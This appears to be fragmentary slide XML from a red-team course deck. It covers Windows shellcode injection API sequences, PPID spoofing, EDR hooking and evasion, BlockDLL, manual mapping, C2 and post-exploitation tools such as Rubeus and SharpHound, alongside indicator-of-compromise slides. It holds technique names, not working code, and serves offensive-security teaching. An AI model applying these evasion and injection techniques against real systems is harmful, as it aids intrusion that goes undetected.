                <a:ext cx="5691819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8467" marR="3387">
                  <a:spcBef>
                    <a:spcPts val="970"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" b="1" spc="10">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>Chapter 3: Active Directory</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Google Shape;1243;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FAADD1B-27B6-56DE-8EB1-0D52D8B237F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4114350" y="256740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877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B5D1581B-A756-DE38-27CC-46640DC9C94C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461AB03B-9272-D119-E611-850ABD00B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5749" y="59985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Static Detection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0AFC0B-F677-F893-ABF1-521201FDB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608" y="1200931"/>
            <a:ext cx="5146783" cy="50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9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B5D1581B-A756-DE38-27CC-46640DC9C94C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461AB03B-9272-D119-E611-850ABD00B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5749" y="59985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Win32 API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101EF65-9992-2162-647D-D7B282F73158}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885194" y="1104311"/>
            <a:ext cx="7373903" cy="427424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</a:rPr>
              <a:t>Windows OS exposes APIs for applications to interact with the system.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</a:rPr>
              <a:t>Windows API forms a bridge from user-land to kernel-land.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b="1" spc="10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>More Control: </a:t>
            </a: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</a:rPr>
              <a:t>The lower the level, the more control you get. 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</a:rPr>
              <a:t>CREATE_SUSPENDED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</a:rPr>
              <a:t>CREATE_NO_WINDOW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</a:rPr>
              <a:t>EXTENDED_STARTUPINFO_PRESENT (PPID Spoofing)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9112B5-629C-7878-DD5B-F501282CA6AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8925724" y="1113375"/>
            <a:ext cx="1985052" cy="6784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F0958D-90AA-25DB-3298-B64998CE36EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8925724" y="2329574"/>
            <a:ext cx="1985052" cy="6784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Win32 API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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(kernel32.dll)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E30EB-B456-7E89-4CE7-D111002F4FE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8945228" y="3536741"/>
            <a:ext cx="1985052" cy="6784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Native API </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" spc="10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(ntdll.dll)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F8A8DC2-526F-AA64-A890-EB24736C4232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9086369" y="1790450"/>
            <a:ext cx="1586926" cy="471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4280EE2-F3C5-D1C8-62F5-4F5B24A3F342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9144291" y="3008000"/>
            <a:ext cx="1586926" cy="471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F7698-47BE-DE93-3782-2FE70AB407CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8418380" y="4628106"/>
            <a:ext cx="3131663" cy="798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spc="10">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="+mj-ea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B2879DD-F494-4B3E-4A6B-4E9AC26736EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9270781" y="4707993"/>
            <a:ext cx="1333946" cy="221880"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 4911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8E07B6-009D-3F90-CB0C-89F32CFA7D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9270781" y="4254625"/>
            <a:ext cx="1333946" cy="376259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="BA121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10" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" spc="10">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="+mj-ea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389B91AB-D4FB-AA3C-C055-86E89EBD6FDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7823111" y="4117019"/>
            <a:ext cx="1321180" cy="432170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970"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b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User Land</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1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054D34BC-E1D9-50C0-F520-6EC9FDA74EA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7748829" y="4643663"/>
            <a:ext cx="1587273" cy="432170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970"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b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Kernel Land</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1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51092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A50EEE-63DA-8AAA-B516-58280FFEA2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63" r="45332"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="281506" y="1019175"/>
            <a:ext cx="1536441" cy="3721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4FB280-15A2-6D84-2738-376F19DE2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32" y="5144115"/>
            <a:ext cx="9915525" cy="1438275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C9E73FFF-DC6D-D886-40BA-1AB7F7791328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BC5C9F2-C9FE-A8FC-E1EE-55481FD62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8202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Injector 1: Runner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0195638-37AF-47F6-3829-016A7D1EC4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1987824" y="1164691"/>
            <a:ext cx="7918598" cy="3412473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970"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b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Classic Shellcode Injection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CreateProcessW</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="10">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRP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VirtualAllocEx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="10">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRP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WriteProcessMemory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="10">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRP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VirtualProtectEx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="10">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRP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CreateRemoteThread</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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4CE89B-8B3C-C85F-4BA6-F198E6488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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6970506" y="1911481"/>
            <a:ext cx="4846622" cy="260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42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8A89B85-D79B-460D-0CCA-163A87ACA9B0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E42E2DA8-7CA2-7CE6-5FE4-A6E39E4D72DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1548202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Injector 2: Clicker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17" name="Picture 16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55F7F9A8-4895-83EC-21A3-38B23E40B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56" y="705413"/>
            <a:ext cx="2106071" cy="4728132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E4DA89F5-8169-5319-4F9B-87F3FB44E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13026"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1235473" y="1441173"/>
          <a:ext cx="6654244" cy="2494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27122">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3346780476"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3327122">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="645977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Win32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NT*API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47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CreateProcessW</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" spc="1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enorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="Trebuchet MS"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/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93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VirtualAllocEx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NtAllocateVirtualMemory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49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WriteProcessMemory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NtWriteVirtualMemory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2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VirtualProtectEx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NtProtectVirtualMemory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CreateRemoteThread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1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enorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>NtCreateThreadEx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102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878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A6D8E-7391-2826-D0AA-82DDE22A8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104" y="862800"/>
            <a:ext cx="9112405" cy="5752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065DF-D7F4-4A7D-6E86-395C7FBBF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6733" y="1900591"/>
            <a:ext cx="3572816" cy="3676956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8A89B85-D79B-460D-0CCA-163A87ACA9B0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6DA2C31-2FE1-FFC5-565C-251546C59D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1548201" y="-13633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Homemade EDR: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" spc="10" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SylantStrike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2017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8A89B85-D79B-460D-0CCA-163A87ACA9B0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6DA2C31-2FE1-FFC5-565C-251546C59D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1548201" y="-13633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EDR Hooking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A358F-89C9-9698-79DA-6B5AB4D23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90" y="1367907"/>
            <a:ext cx="10534650" cy="1733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E123D3-7B77-5EBA-AB16-64CED6A4A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390" y="3478375"/>
            <a:ext cx="105251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26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8A89B85-D79B-460D-0CCA-163A87ACA9B0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E42E2DA8-7CA2-7CE6-5FE4-A6E39E4D72DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1548202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Injector 3: Bloater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D1B7D481-FB83-13D6-9132-E4A7F7C263F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128228" y="952129"/>
            <a:ext cx="8398147" cy="1735090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970"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b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Process Mitigation Policy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Blocks EDR’s DLLs from injecting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Only Microsoft DLL permitted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="Tlou bloater png 1 by dinomaster1567 on DeviantArt">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E762F27D-B9C8-2CF6-AE03-36E11C9A6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418" y="220984"/>
            <a:ext cx="379095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ABC741-CD8B-B329-3769-8630C4B0C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537" y="2902732"/>
            <a:ext cx="6450203" cy="35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17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C8A89B85-D79B-460D-0CCA-163A87ACA9B0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E42E2DA8-7CA2-7CE6-5FE4-A6E39E4D72DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1548202" y="7358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Downfall of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" spc="10" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>BlockDLL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C570E-9938-F0C7-946D-D537521FD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818" y="1053410"/>
            <a:ext cx="6257051" cy="532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1032" name="Picture 8" descr="Infected | The Last of Us Wiki | Fandom">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E4E052-B1BF-989B-62A1-DD9316710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573" y="1001486"/>
            <a:ext cx="2943806" cy="424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4D33E2-6794-7F13-8D89-987CA415A2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46188" b="21205"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003072" y="2189966"/>
            <a:ext cx="4352204" cy="4351274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18585B15-F5C3-BEB0-95D4-6519680B36E7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E49AC859-ECC4-987A-0B1B-D49F0B58A0FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554101" y="20489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Injector 4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" spc="10" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>RatKing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2305535-149E-880F-4764-077008D9D85E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003072" y="904035"/>
            <a:ext cx="5045200" cy="1175963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>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="970"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b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Manual Mapping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="808355" marR="3175" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="970"/>
              </a:spcBef>
              <a:buFont typeface="Arial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/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Free of EDR Hooks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41D8A-28FA-DFBE-A89F-FA86D3B30D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91" r="-79" b="21205"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5355276" y="2189966"/>
            <a:ext cx="3371576" cy="43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67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899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18585B15-F5C3-BEB0-95D4-6519680B36E7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E49AC859-ECC4-987A-0B1B-D49F0B58A0FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1548202" y="2792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Bonus: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" spc="10" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>RustKing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A5E369-9C6B-A190-AB9F-5C7B75D1F2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876"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="774267" y="1004320"/>
            <a:ext cx="5408257" cy="3754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B96E7-2A5F-C4A8-6B80-6F249A17B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102"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233181" y="2571353"/>
            <a:ext cx="6031697" cy="4004532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="OffensiveRust">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7158F21A-F8C0-5C06-020E-A2BC0356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402" y="316760"/>
            <a:ext cx="1983681" cy="213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2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6EA4A7B8-A3B8-6FEC-851A-F602E36DD029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Google Shape;162;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D1B5CE-6A28-24C9-C466-3226B88FB2D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2848533" y="2599029"/>
            <a:ext cx="5788121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CHAPTER 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;164;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{673C25EE-D214-A123-6D15-6FDF4EF0A6DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3467810" y="3736880"/>
            <a:ext cx="468021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5400" ker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Intro to C2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Google Shape;165;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{927691D9-2DA4-3D45-E7D3-B7FC18C60912}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3103061" y="3167954"/>
            <a:ext cx="5409708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64651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18585B15-F5C3-BEB0-95D4-6519680B36E7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DD20936-4752-AD2D-94E0-A1AC51973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Post-Exploitation Defense Evasion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D87D054E-6EB7-8221-88FF-6E1762ECD6B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141968" y="1404094"/>
            <a:ext cx="8524277" cy="3848489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1367" marR="3387" indent="-3429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OPSEC Consideration: Dropping File On-Disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="351367" marR="3387" indent="-3429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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>PowerPick</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" spc="10">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="808567" marR="3387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Unmanaged PowerShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808567" marR="3387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Fork &amp; Run (Sacrificial Process)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Inline-Execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808567" marR="3387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Bring Your Own Land (CLR Injection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808567" marR="3387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.NET Assemblies (Rubeus, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="10" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SharpUp</a:t>
            </a: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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="10" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Sharphound</a:t>
            </a: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)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Run with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{380E6DAF-E397-F115-83A5-319D540B3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3250" y="2765322"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 11" descr="Fork with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13FAF6FE-A954-1BEF-6B54-AFA0A26A8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6150" y="2712228"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16" descr="Add with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9A06102-DE99-105D-2ED0-E8E213407C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70550" y="2993922"/>
            <a:ext cx="362811" cy="3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42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18585B15-F5C3-BEB0-95D4-6519680B36E7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741DED00-959C-ABD7-9A9D-6F88963144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IoC – Sacrificial Process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A41ABB-6C9F-1B79-AB5D-67C0E073C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505" y="2793616"/>
            <a:ext cx="7929983" cy="16399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A10355-B56C-19B5-C4E5-3BE66825E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591" y="1153318"/>
            <a:ext cx="3991532" cy="13908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34F64D-2766-401A-290C-FC9D1E105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124" y="4695230"/>
            <a:ext cx="7934746" cy="162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43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18585B15-F5C3-BEB0-95D4-6519680B36E7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E64681E-830E-8343-14B7-22F753E834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>
          <a:xfrm>
            <a:off x="761188" y="931869"/>
            <a:ext cx="4848154" cy="5465752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0889A41-5181-BFE1-5081-38508D2906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8" b="28868"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860155" y="931869"/>
            <a:ext cx="4799808" cy="3887903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C807C80A-7AD3-A799-4C53-18CA2AD98E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8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873768" y="5040896"/>
            <a:ext cx="4772581" cy="1344927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{741DED00-959C-ABD7-9A9D-6F88963144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IoC - CLR Injection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3459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F15F1AD9-EC5D-7F87-4B57-843B432B50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221548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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C96ACBD-B2E5-EEF8-C3CD-C39C7E9868AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1871984" y="2756593"/>
            <a:ext cx="8244832" cy="134481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8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let’s take a break</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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C139D42E-C77B-A3B0-32D8-4AED0E82CCE2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760245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6EA4A7B8-A3B8-6FEC-851A-F602E36DD029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Google Shape;162;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D1B5CE-6A28-24C9-C466-3226B88FB2D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2848533" y="2162175"/>
            <a:ext cx="5788121" cy="1081554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Bold"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CHAPTER 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;164;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{673C25EE-D214-A123-6D15-6FDF4EF0A6DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
